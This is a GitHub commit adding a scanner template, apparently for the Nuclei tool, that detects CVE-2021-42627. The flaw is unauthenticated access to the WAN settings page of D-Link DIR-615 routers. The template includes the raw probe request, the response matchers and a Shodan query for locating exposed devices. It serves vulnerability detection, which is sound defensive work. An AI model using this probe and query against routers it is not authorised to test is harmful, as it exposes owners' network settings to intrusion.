Create CVE-2021-42627.yaml

patch-1
林寒 2022-08-24 10:47:25 +08:00 committed by GitHub
parent debc17529f
commit e0e15520c0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 38 additions and 0 deletions

View File

@ -0,0 +1,38 @@
id: CVE-2021-42627
info:
name: D-Link DIR-615 - Information Disclosure
author: For3stCo1d
severity: medium
description: |
The WAN configuration page "wan.htm" on D-Link DIR-615 devices with firmware 20.06 can be accessed directly without authentication which can lead to disclose the information about WAN settings and also leverage attacker to modify the data fields of page.
reference:
- https://github.com/sanjokkarki/D-Link-DIR-615/blob/main/CVE-2021-42627
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42627
- https://nvd.nist.gov/vuln/detail/CVE-2021-42627
metadata:
shodan-query: http.title:"Roteador Wireless"
verified: "true"
tags: cve,cve2022,d-link,router,exposure
requests:
- raw:
- |
GET /wan.htm HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "document.write(\"<s\"+\"cript type='text/javascript' src='menu.js?v=\"+Math.random()+\"'></scr\"+\"ipt>\");"
- type: word
part: header
words:
- Virtual Web
- type: status
status:
- 200